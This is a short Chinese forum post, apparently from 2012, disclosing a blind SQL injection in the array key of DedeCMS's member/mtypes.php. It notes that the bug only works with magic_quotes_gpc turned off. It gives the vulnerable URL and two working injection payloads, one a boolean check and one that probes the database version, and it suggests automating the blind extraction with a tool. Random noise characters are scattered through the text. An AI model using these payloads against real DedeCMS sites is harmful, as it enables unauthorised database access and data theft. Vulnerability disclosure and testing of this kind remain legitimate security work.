需要magic_quotes_gpc = Off,所以说是鸡肋啊.
t+ {- |4 O7 v5 |( h
o) a; b/ Y/ _8 B/ p 1 Z7 I* ~, j/ [4 H$ r
发生在数组key里的注射漏洞,有点意思./ u0 l% H% ?' o2 t
1 d; S. r7 Z$ S+ ?' E) k0 T1 y
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下* w, V0 S. ~# v3 G4 L7 u" i
' {2 I/ r0 x4 E6 y9 D2 I4 W$ E6 y
http://www.xxx.com /dede/member/mtypes.php?dopost=save
1 U8 L7 [8 S& q
- @% z- M" L7 }6 ^& V; ^# u" _exploit:4 N& C# q0 x& m2 {8 N6 p
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r6 B F) b+ X; ^9 g, O& u! s
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r' u5 e0 m; Z4 k
|
发表于 2012-12-20 08:08:09
收藏
支持
反对